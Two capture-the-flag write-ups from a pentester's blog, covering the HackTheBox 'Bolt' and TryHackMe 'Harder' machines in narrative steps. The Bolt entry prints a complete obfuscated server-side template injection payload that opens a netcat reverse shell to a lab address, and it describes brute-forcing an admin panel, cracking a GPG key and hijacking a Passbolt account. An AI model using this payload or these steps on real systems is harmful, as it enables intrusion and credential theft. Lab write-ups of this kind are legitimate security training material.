Mostrando entradas con la etiqueta gpg. Mostrar todas las entradas
Mostrando entradas con la etiqueta gpg. Mostrar todas las entradas

domingo, 20 de febrero de 2022

Bolt HackTheBox Writeup

 |  , , , ,  | 

logo

Scanning

We run nmap on all ports with scripts and software versions.

Enumeration

We put the subdomain in the /etc/hosts file and access the web resource.

We access the resource through port 443 and find a passbolt deployed.

We need invitation for used.

Exploitation

We use hydra on the "bolt.htb/admin" authentication panel and obtain the administrator credentials.

We access with the credentials and go to the mail.

We see that they are having a conversation in which they have uploaded a Docker image to the server.

We do virtualhosting with wfuzz, we find these subdomains:

Roundcube

Create account bolt.htb

Download image.tar

We unzip the files, we find a SQLite database.

Hash cracking

We use grep to search for the invitation code and find a file that exposes it.

We register an account and use the invitation code.

We also have access to email

In testing, we found that it is vulnerable to SSTI (Server-Side Template Injection).

PoC

Result for mail

We insert the payload in the name change and apply the changes.

{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.XX.XX 443 >/tmp/f')|attr('read')()}}

We will receive an email, so we will set a netcat to listen and click on it.

Reverse shell

We do a reconnaissance and find some credentials in the file "passbolt.php".

We tested these credentials on the user "eddie" and they work!

Privilege Escalation

.config/google-chrome/Default/Local Extension Settings/didegimhafipceonhjepacocaffmoppf/000003.log

We use gpg2john and get the hash in the file to crack it with john.

Cracking with John

Searching for information, we found through Google this link on how to recover a "Passbolt" account with the GPG key and password. Sound familiar?

https://community.passbolt.com/t/recover-account-on-a-network-without-email/1394

We access the database with the credentials found above.

Select the user "Eddie", take his ID and token, this will be the data we need to create the cue recovery link.

Recovery account

https://passbolt.bolt.htb/setup/recover/ID/TOKEN

Access the link, load the gpg file and now enter your password (the one we cracked earlier with john).

Once inside, we can see the root password.

We authenticate as the root user and read the flag.

About

David Utón is Penetration Tester and security auditor for web and mobiles applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks.

Contacted on:

David-Uton @David_Uton

Share This:    Facebook Twitter Linkedin

miércoles, 19 de junio de 2019

Harder TryHackMe Writeup

 |  , , , , ,  | 

logo

Scanning

We scan the open ports with the nmap tool with scripts and software versions.

Enumeration

We access the web service and find the corporate website and the software they use.

Using the Nikto tool, we list a phpinfo.php file that can also help us to list deployed software and its exact versions.

PHPinfo File

We see in the server response that it reveals a domain name, we add it to our "/etc/hosts" file.

We list an administration panel that asks for credentials.

We set the default credentials to "admin:admin" and it lets us through, but we get the following message...

We use dirsearch and several seclist dictionaries, we list some files and directories that might be relevant.

We can't access it from the browser, but we can use the GitTools suite to dumpe it.

We extract information...

We read the file "index.php", we see that it requires the file "hmac.php".

Contents of file "hmac.php".

The best way to be able to review code is to play with it, so I used a web to run PHP to debug the code and do a test to get an hmac hash for a personal host.

<?php
$secret = hash_hmac('sha256', "m3n0sd0n4ld.github.io", false);
echo $secret;

Now with all the data, we fill in the variables and we see that the site returns a new url and credentials.

We access the new site, enter the credentials but it seems that it only allows access to a specific network range.

We add the header "X-Forwarded-For: 10.10.10.X" and we see that it opens the web site.

Exploitation

Once inside, we see that we can execute system commands.

Read user flag

We see that the shell type is an "ash", so we change the netcat type and we will get a more or less stable reverse shell.

Reverse shell

We do an enumeration on the machine, we find a backup file that hides the credentials of the user "evs".

We connect via SSH to have a more stable session.

Privilege Escalation

Let's remember the file we found with the "evs" credentials (ToDo: create a backup script....)

We use find to list the scripts that we could review.

So nothing, we do a test with the "whoami" command, encrypt it with gpg and run the "execute-crypted" binary and see that it executes "root".

Great! So now we use netcat again to establish a reverse shell as root, we put it in the "command" file, do a cat to check that it is OK, encrypt the file in gpg and run the binary.... Below we will see that we already have a shell as root and we can read the flag.

About

David Utón is Penetration Tester and security auditor for web and mobiles applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks.

Contacted on:

David-Uton @David_Uton

Share This:    Facebook Twitter Linkedin